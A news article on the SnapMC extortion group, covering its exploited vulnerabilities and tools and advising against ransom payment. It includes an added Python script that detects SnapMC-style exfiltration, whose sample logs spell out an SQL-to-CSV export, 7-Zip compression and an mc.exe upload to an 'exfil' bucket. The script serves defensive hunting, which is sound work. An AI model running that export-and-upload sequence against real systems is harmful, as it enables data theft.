A new threat actor tracked as SnapMC has emerged in the cybercrime space, performing the data-theft extortion that underlies many ransomware operations, but without the file encryption part.
File encryption is considered an essential component of ransomware attacks because it is the very element that disrupts the victim’s operations.
Data exfiltration for double extortion came later, as an additional form of leverage against a victim, but was initially secondary to the chaos caused by an encrypted network.
Ransomware players soon realized the power of this approach: many companies could restore encrypted files from backups, but could not undo the theft of their files or its consequences.
NCC Group researchers have tracked a new adversary they call SnapMC, named after the speed of its attacks and the MinIO client (mc.exe) it uses: the group breaks into a network, steals files and sends extortion emails in less than 30 minutes.
Targeting known vulnerabilities
The SnapMC gang uses the Acunetix vulnerability scanner to find flaws in a target's VPN and web server applications, then exploits them to breach the corporate network.
The flaws most often exploited for initial access are a remote code execution vulnerability in Telerik UI for ASP.NET (CVE-2019-18935) and various SQL injection opportunities; once inside, the actor has used the PrintNightmare local privilege escalation (CVE-2021-34527) to elevate privileges.
The actors run SQL database export scripts to collect data as CSV files, compress those files with the 7-Zip archive utility, and then use the MinIO client (mc.exe) to upload the archive to attacker-controlled storage.
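The export, compress and upload sequence described above is what a defender can hunt for in process-creation telemetry. The script below is an added detection example written for this article; it is not code from the original page or from NCC Group's report. It tokenizes constructed process-creation events (the field layout timestamp|host|user|image|command line, the sample events, the sqlcmd/bcp, 7z and mc tool names it keys on, and the 30-minute window are all assumptions for the example) and reports every mc.exe upload that was preceded on the same host by a CSV export and a 7-Zip compression of CSV files.

```python
"""
Added detection example, not code from the original article or from NCC Group's
report. It flags the SnapMC-style exfiltration chain (SQL export to CSV, 7-Zip
compression of the CSVs, upload with the MinIO client mc.exe) when all three
stages occur on one host inside a short window. The event layout, the tool
names, the sample events and the 30-minute window are constructed assumptions.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry in the shape of process-creation events (not real logs):
# timestamp|host|user|image|command line
SAMPLE_EVENTS = """\
2021-10-11T09:12:03|WEB01|IIS APPPOOL\\DefaultAppPool|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
2021-10-11T09:14:41|WEB01|NT AUTHORITY\\SYSTEM|C:\\Tools\\sqlcmd.exe|sqlcmd.exe -S . -d crm -Q "SELECT * FROM customers" -s "," -o C:\\Windows\\Temp\\customers.csv
2021-10-11T09:17:09|WEB01|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\7z.exe|7z.exe a -tzip C:\\Windows\\Temp\\out.zip C:\\Windows\\Temp\\*.csv
2021-10-11T09:19:55|WEB01|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\mc.exe|mc.exe cp C:\\Windows\\Temp\\out.zip myminio/exfil/out.zip
2021-10-11T13:02:10|FS02|CORP\\backupsvc|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a D:\\Backups\\nightly.7z D:\\Shares\\*.csv
"""


def _tokenize(cmd):
    # posix=False keeps Windows backslashes intact while still honouring quotes
    try:
        return shlex.split(cmd, posix=False)
    except ValueError:  # unbalanced quote: fall back to a plain split
        return cmd.split()


def _has_csv(argv):
    return any(".csv" in a.lower() for a in argv)


# stage name -> (image basenames, predicate over the tokenized command line)
STAGE_RULES = {
    "export": ({"sqlcmd.exe", "bcp.exe"}, _has_csv),
    "compress": ({"7z.exe", "7za.exe"},
                 lambda argv: len(argv) > 1 and argv[1] == "a" and _has_csv(argv)),
    "upload": ({"mc.exe"},
               lambda argv: len(argv) > 1 and argv[1] in {"cp", "mirror"}),
}


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, cmd = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host, "user": user,
                       "image": image, "argv": _tokenize(cmd)})
    return events


def classify(event):
    """Return the exfiltration stage an event represents, or None."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    for stage, (images, predicate) in STAGE_RULES.items():
        if name in images and predicate(event["argv"]):
            return stage
    return None


def find_exfil_chains(events, window_minutes=30):
    """One finding per mc upload preceded, on the same host and inside the
    window, by a CSV export and then a 7-Zip compression of CSV files."""
    window = timedelta(minutes=window_minutes)
    staged_by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            staged_by_host[ev["host"]].append((stage, ev))
    findings = []
    for host, staged in staged_by_host.items():
        for i, (stage, upload) in enumerate(staged):
            if stage != "upload":
                continue
            # most recent occurrence of each earlier stage inside the window
            recent = {s: e for s, e in staged[:i] if upload["ts"] - e["ts"] <= window}
            if all(s in recent for s in ("export", "compress")) \
                    and recent["export"]["ts"] <= recent["compress"]["ts"]:
                findings.append({"host": host, "user": upload["user"],
                                 "started": recent["export"]["ts"].isoformat(),
                                 "uploaded": upload["ts"].isoformat(),
                                 "destination": upload["argv"][-1]})
    return findings


if __name__ == "__main__":
    for finding in find_exfil_chains(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The nightly 7-Zip job on FS02 in the sample is deliberately not flagged: archiving CSVs alone is routine, and it is the ordered sequence ending in an mc upload that is the signal. In production, the image names would come from the organisation's own baseline of approved tools and the window from its observed dwell times.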
Since SnapMC exploits known vulnerabilities for which patches are already available, keeping software up to date is the most direct defense against this growing threat.
As NCC Group points out in its report, even an organization running a vulnerable version of Telerik can blunt exploitation attempts by placing it behind a well-configured web application firewall; this is a mitigation, not a substitute for patching.
Paying is risky
In data exfiltration extortion attacks, paying the ransom is no guarantee that the threat actor will keep its word. On the contrary, it could encourage the attackers to attempt further extortion in the future.
It is also possible that even if a victim pays a ransom, their data ends up being sold in criminal markets or hacker forums, which is another way to generate income for the attackers.
Coveware, a firm that handles ransomware negotiations and incident response, strongly advises its clients never to pay a ransom in exchange for a promise that stolen files will not be published.
In past cases, victims have paid during negotiations only to have their data published anyway, or to receive no credible evidence of deletion:
- Sodinokibi: victims who paid were re-extorted weeks later with threats to release the same data set
- Netwalker: published data of companies that had paid for it not to be disclosed
- Mespinoza: released data of companies that had paid for it not to be disclosed
- Conti: showed fake files as proof of deletion
For this reason, victims should automatically assume that their data has been shared with other threat actors and will be used or disclosed in the future, regardless of whether or not they have paid a ransom.